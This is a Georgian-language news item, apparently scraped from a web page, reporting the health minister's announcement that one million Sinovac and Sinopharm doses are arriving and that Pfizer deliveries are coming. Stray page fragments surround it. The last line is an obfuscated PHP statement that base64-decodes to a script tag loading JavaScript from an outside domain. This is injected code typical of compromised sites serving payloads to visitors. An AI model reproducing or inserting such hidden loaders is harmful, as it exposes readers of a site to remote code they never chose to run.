celsiusi
ავერსი შნაიდერი
ჯანდაცვის მინისტრის ეკატერინე ტიკარაძის განცხადებით, ჩინური წარმოების ვაქცინები საქართველოში მიმდინარე კვირის ბოლოს შემოვა, რაც მასობრივი ვაქცინაციის დაწყებას შესაძლებელს გახდის. მისი თქმით, საუბარია ნახევარ მილიონ დოზა "სინოვაკსა" და ნახევარ მილიონ დოზა "სინოფარმზე".
 
ეკატერინე ტიკარაძე Pfizer-ის ქვეყანაში ჩამოსვლის თარიღს ვერ აკონკრეტებს, თუმცა ამბობს, რომ აღნიშნული ვაქცინაც უახლოეს პერიოდში მასობრივ ვაქცინაციაში ჩაერთვება. აღნიშნულ საკითზე ჯანდაცვის მინისტრმა მთავრობის სხდომის დასრულების შემდეგ გამართულ ბრიფინგზე ისაუბრა.
 
„მწარმოებელთან გარკვეული მოლაპარაკებების საფუძველზე, რაც გაუთქმელობის ხელშეკრულებას გულისხმობს, ჩვენ არ გვაქვს უფლება დავასახელოთ მნიშვნელოვანი დეტალები, რომელიც საზოგადოებას აინტერესებს, თუმცა იმ მწარმოებელთან, სადაც ეს კონფიდენციალურობა დაცული არ არის, შეგვიძლია დავადასტუროთ, რომ 1 მლნ ვაქცინა: 0.5 მლნ - "სინოვაკი" და 0.5 მლნ - "სინოფარმი" უკვე კვირის ბოლოს საქართველოში უნდა იყოს. შესაბამისად, შემდეგი კვირის დასაწყისიდან ჩვენ ამ ვაქცინებით მასობრივი ვაქცინაციის დაწყებას შევძლებთ.
 
რაც შეეხება ერთ-ერთ პოპულარულ ვაქცინას, რომლის ჩამოსვლის თარიღს კონტრაქტიდან გამომდინარე ვერ დავასახელებთ, თუმცა ჩვენ უკვე დადასტურებულად ვიცით თარიღი, თუ როდის იქნება Pfizer-ი საქართველოში და შესაბამისად, ეს ვაქცინაც მასობრივი ვაქცინაციის პროცესში ჩაერთვება. საქართველოში 1 მლნ-ზე მეტი Pfizer-ი შემოვა, მოხდება მისი ეტაპობრივი მოწოდება“, - განაცხადა მინისტრმა.
1145
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");